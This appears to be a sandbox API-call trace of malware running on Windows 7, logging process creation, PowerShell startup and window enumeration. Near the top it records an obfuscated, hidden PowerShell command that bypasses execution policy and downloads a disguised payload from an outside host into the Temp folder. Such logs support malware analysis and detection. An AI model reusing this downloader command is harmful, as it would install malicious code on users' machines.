	[0055.267] GetStartupInfoW (in: lpStartupInfo=0x14eea0 | out: lpStartupInfo=0x14eea0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) 
	[0055.268] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1
	[0055.269] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\aETAdzjz\\Documents", lpStartupInfo=0x14edc0*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14ed70 | out: lpCommandLine="PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); ", lpProcessInformation=0x14ed70*(hProcess=0x54, hThread=0x50, dwProcessId=0x964, dwThreadId=0x968)) returned 1
	[0055.273] CloseHandle (hObject=0x50) returned 1
	[0055.273] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0055.273] GetProcessHeap () returned 0x220000
	[0055.273] HeapFree (in: hHeap=0x220000, dwFlags=0x0, lpMem=0x23bb10 | out: hHeap=0x220000) returned 1
	[0055.273] GetEnvironmentStringsW () returned 0x23b8d0*
	[0055.273] GetProcessHeap () returned 0x220000
	[0055.273] RtlAllocateHeap (HeapHandle=0x220000, Flags=0x8, Size=0xb2c) returned 0x23c820
	[0055.273] FreeEnvironmentStringsW (penv=0x23b8d0) returned 1
	[0055.273] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) 

Process:
	id = "11"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x15d06000"
	os_pid = "0x964"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "10"
	os_parent_pid = "0x838"
	cmd_line = "PowErshelL.eXe  -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\\Users\\aETAdzjz\\AppData\\Local\\TempxeE84.png'); "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 98
	os_tid = 0x968

	[0061.554] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0062.736] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0062.736] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0062.736] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0062.736] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0064.622] GetVersionExW (in: lpVersionInformation=0x29dcb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x29dcb0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0064.624] GetVersionExW (in: lpVersionInformation=0x29dcb0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x29dcb0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0064.670] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.711] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0064.711] GetVersionExW (in: lpVersionInformation=0x29da20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x29da20*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0064.712] SetErrorMode (uMode=0x1) returned 0x1
	[0064.712] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x29db80 | out: lpFileInformation=0x29db80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0064.713] SetErrorMode (uMode=0x1) returned 0x1
	[0064.748] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x29ddf0 | out: lpdwHandle=0x29ddf0) returned 0x94c
	[0064.770] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2ca7370 | out: lpData=0x2ca7370) returned 1
	[0064.772] VerQueryValueW (in: pBlock=0x2ca7370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x29dd68, puLen=0x29dd60 | out: lplpBuffer=0x29dd68*=0x2ca740c, puLen=0x29dd60) returned 1
	[0064.774] lstrlenW (lpString="䅁") returned 1
	[0064.782] VerQueryValueW (in: pBlock=0x2ca7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x29dcd8, puLen=0x29dcd0 | out: lplpBuffer=0x29dcd8*=0x2ca74e8, puLen=0x29dcd0) returned 1
	[0064.783] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0064.785] CoTaskMemAlloc (cb=0x2e) returned 0x4c37f0
	[0064.786] lstrcpyW (in: lpString1=0x4c37f0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0064.787] CoTaskMemFree (pv=0x4c37f0) 
	[0064.787] VerQueryValueW (in: pBlock=0x2ca7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x29dcd8, puLen=0x29dcd0 | out: lplpBuffer=0x29dcd8*=0x2ca753c, puLen=0x29dcd0) returned 1
	[0064.787] lstrlenW (lpString="System.Management.Automation") returned 28
	[0064.787] CoTaskMemAlloc (cb=0x3c) returned 0x47a110
	[0064.787] lstrcpyW (in: lpString1=0x47a110, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0064.787] CoTaskMemFree (pv=0x47a110) 
	[0064.787] VerQueryValueW (in: pBlock=0x2ca7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x29dcd8, puLen=0x29dcd0 | out: lplpBuffer=0x29dcd8*=0x2ca7598, puLen=0x29dcd0) returned 1
	[0064.787] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0064.787] CoTaskMemAlloc (cb=0x20) returned 0x4c9950
	[0064.787] lstrcpyW (in: lpString1=0x4c9950, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0064.787] CoTaskMemFree (pv=0x4c9950) 
	[0064.787] VerQueryValueW (in: pBlock=0x2ca7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x29dcd8, puLen=0x29dcd0 | out: lplpBuffer=0x29dcd8*=0x2ca75d8, puLen=0x29dcd0) returned 1
	[0064.787] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0064.787] CoTaskMemAlloc (cb=0x44) returned 0x47a110
	[0064.787] lstrcpyW (in: lpString1=0x47a110, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0064.787] CoTaskMemFree (pv=0x47a110) 
	[0064.787] VerQueryValueW (in: pBlock=0x2ca7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x29dcd8, puLen=0x29dcd0 | out: lplpBuffer=0x29dcd8*=0x2ca7640, puLen=0x29dcd0) returned 1
	[0064.787] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0064.787] CoTaskMemAlloc (cb=0x76) returned 0x464250
	[0064.787] lstrcpyW (in: lpString1=0x464250, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0064.787] CoTaskMemFree (pv=0x464250) 
	[0064.787] VerQueryValueW (in: pBlock=0x2ca7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x29dcd8, puLen=0x29dcd0 | out: lplpBuffer=0x29dcd8*=0x2ca76dc, puLen=0x29dcd0) returned 1
	[0064.787] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0064.787] CoTaskMemAlloc (cb=0x44) returned 0x47a110
	[0064.787] lstrcpyW (in: lpString1=0x47a110, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0064.787] CoTaskMemFree (pv=0x47a110) 
	[0064.787] VerQueryValueW (in: pBlock=0x2ca7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x29dcd8, puLen=0x29dcd0 | out: lplpBuffer=0x29dcd8*=0x2ca7740, puLen=0x29dcd0) returned 1
	[0064.787] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0064.787] CoTaskMemAlloc (cb=0x58) returned 0x425ac0
	[0064.787] lstrcpyW (in: lpString1=0x425ac0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0064.787] CoTaskMemFree (pv=0x425ac0) 
	[0064.788] VerQueryValueW (in: pBlock=0x2ca7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x29dcd8, puLen=0x29dcd0 | out: lplpBuffer=0x29dcd8*=0x2ca77bc, puLen=0x29dcd0) returned 1
	[0064.788] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0064.788] CoTaskMemAlloc (cb=0x20) returned 0x4c9950
	[0064.788] lstrcpyW (in: lpString1=0x4c9950, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0064.788] CoTaskMemFree (pv=0x4c9950) 
	[0064.788] VerQueryValueW (in: pBlock=0x2ca7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x29dcd8, puLen=0x29dcd0 | out: lplpBuffer=0x29dcd8*=0x2ca7464, puLen=0x29dcd0) returned 1
	[0064.788] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0064.788] CoTaskMemAlloc (cb=0x66) returned 0x4c7780
	[0064.788] lstrcpyW (in: lpString1=0x4c7780, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0064.788] CoTaskMemFree (pv=0x4c7780) 
	[0064.788] VerQueryValueW (in: pBlock=0x2ca7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x29dcd8, puLen=0x29dcd0 | out: lplpBuffer=0x29dcd8*=0x0, puLen=0x29dcd0) returned 0
	[0064.788] VerQueryValueW (in: pBlock=0x2ca7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x29dcd8, puLen=0x29dcd0 | out: lplpBuffer=0x29dcd8*=0x0, puLen=0x29dcd0) returned 0
	[0064.788] VerQueryValueW (in: pBlock=0x2ca7370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x29dcd8, puLen=0x29dcd0 | out: lplpBuffer=0x29dcd8*=0x0, puLen=0x29dcd0) returned 0
	[0064.788] VerQueryValueW (in: pBlock=0x2ca7370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x29dca8, puLen=0x29dca0 | out: lplpBuffer=0x29dca8*=0x2ca740c, puLen=0x29dca0) returned 1
	[0064.835] CoTaskMemAlloc (cb=0x204) returned 0x46bc50
	[0064.835] VerLanguageNameW (in: wLang=0x0, szLang=0x46bc50, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0064.837] CoTaskMemFree (pv=0x46bc50) 
	[0064.837] VerQueryValueW (in: pBlock=0x2ca7370, lpSubBlock="\\", lplpBuffer=0x29dcf8, puLen=0x29dcf0 | out: lplpBuffer=0x29dcf8*=0x2ca7398, puLen=0x29dcf0) returned 1
	[0064.873] GetCurrentProcessId () returned 0x964
	[0064.959] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x29cc20 | out: lpLuid=0x29cc20*(LowPart=0x14, HighPart=0)) returned 1
	[0064.963] GetCurrentProcess () returned 0xffffffffffffffff
	[0064.964] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x29cc40 | out: TokenHandle=0x29cc40*=0x2f0) returned 1
	[0064.977] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2caabe8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0064.985] CloseHandle (hObject=0x2f0) returned 1
	[0065.001] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x964) returned 0x2f0
	[0065.039] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2caac50, cb=0x200, lpcbNeeded=0x29dc58 | out: lphModule=0x2caac50, lpcbNeeded=0x29dc58) returned 1
	[0065.047] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13ff20000, lpmodinfo=0x2caaec0, cb=0x18 | out: lpmodinfo=0x2caaec0*(lpBaseOfDll=0x13ff20000, SizeOfImage=0x77000, EntryPoint=0x13ff2c63c)) returned 1
	[0065.048] CoTaskMemAlloc (cb=0x804) returned 0x4cff00
	[0065.048] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13ff20000, lpBaseName=0x4cff00, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0065.048] CoTaskMemFree (pv=0x4cff00) 
	[0065.049] CoTaskMemAlloc (cb=0x804) returned 0x4cff00
	[0065.049] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13ff20000, lpFilename=0x4cff00, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0065.049] CoTaskMemFree (pv=0x4cff00) 
	[0065.050] CloseHandle (hObject=0x2f0) returned 1
	[0065.122] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x964) returned 0x2f0
	[0065.137] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x29dd88 | out: lpExitCode=0x29dd88*=0x103) returned 1
	[0065.145] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12cab088, Length=0x20000, ResultLength=0x29dd50 | out: SystemInformation=0x12cab088, ResultLength=0x29dd50*=0xf2b8) returned 0x0
	[0065.227] EnumWindows (lpEnumFunc=0x29b66ac, lParam=0x0) returned 1
	[0065.228] GetWindowThreadProcessId (in: hWnd=0x50212, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.228] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.228] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.228] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x334
	[0065.228] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x324
	[0065.228] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.228] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.228] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.229] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.229] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.229] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.229] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.229] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.229] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.229] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x45c
	[0065.229] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.229] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.229] GetWindowThreadProcessId (in: hWnd=0x50228, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x5e0
	[0065.229] GetWindowThreadProcessId (in: hWnd=0x5021c, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x90
	[0065.229] GetWindowThreadProcessId (in: hWnd=0xa00a4, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.230] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x914
	[0065.230] GetWindowThreadProcessId (in: hWnd=0x400d6, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.230] GetWindowThreadProcessId (in: hWnd=0x400fa, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.230] GetWindowThreadProcessId (in: hWnd=0x500d2, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.230] GetWindowThreadProcessId (in: hWnd=0x400bc, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.230] GetWindowThreadProcessId (in: hWnd=0x400c8, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.230] GetWindowThreadProcessId (in: hWnd=0x500d8, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.230] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x4a0
	[0065.230] GetWindowThreadProcessId (in: hWnd=0x4021a, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x840
	[0065.230] GetWindowThreadProcessId (in: hWnd=0x3021e, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x844
	[0065.230] GetWindowThreadProcessId (in: hWnd=0x401f6, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x46c
	[0065.230] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0xb40
	[0065.231] GetWindowThreadProcessId (in: hWnd=0x40116, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x914
	[0065.231] GetWindowThreadProcessId (in: hWnd=0x700d4, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x988
	[0065.231] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x914
	[0065.231] GetWindowThreadProcessId (in: hWnd=0x201b8, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x950
	[0065.231] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x914
	[0065.231] GetWindowThreadProcessId (in: hWnd=0x201a8, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x914
	[0065.231] GetWindowThreadProcessId (in: hWnd=0x201aa, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x868
	[0065.231] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x850
	[0065.231] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x830
	[0065.231] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x814
	[0065.231] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x744
	[0065.231] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x2a8
	[0065.232] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x534
	[0065.232] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x5e4
	[0065.232] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x5c4
	[0065.232] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x58c
	[0065.232] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x238
	[0065.232] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x584
	[0065.232] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x7e8
	[0065.232] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x678
	[0065.232] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x35c
	[0065.232] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x51c
	[0065.232] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x360
	[0065.232] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x274
	[0065.233] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x588
	[0065.233] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0xc8
	[0065.233] GetWindowThreadProcessId (in: hWnd=0xa010a, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x21c
	[0065.233] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x5ec
	[0065.233] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x334
	[0065.233] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x664
	[0065.233] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x334
	[0065.233] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x664
	[0065.233] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x334
	[0065.233] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x5ec
	[0065.233] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x5ec
	[0065.233] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x29dab0 | out: lpdwProcessId=0x29dab0) returned 0x550
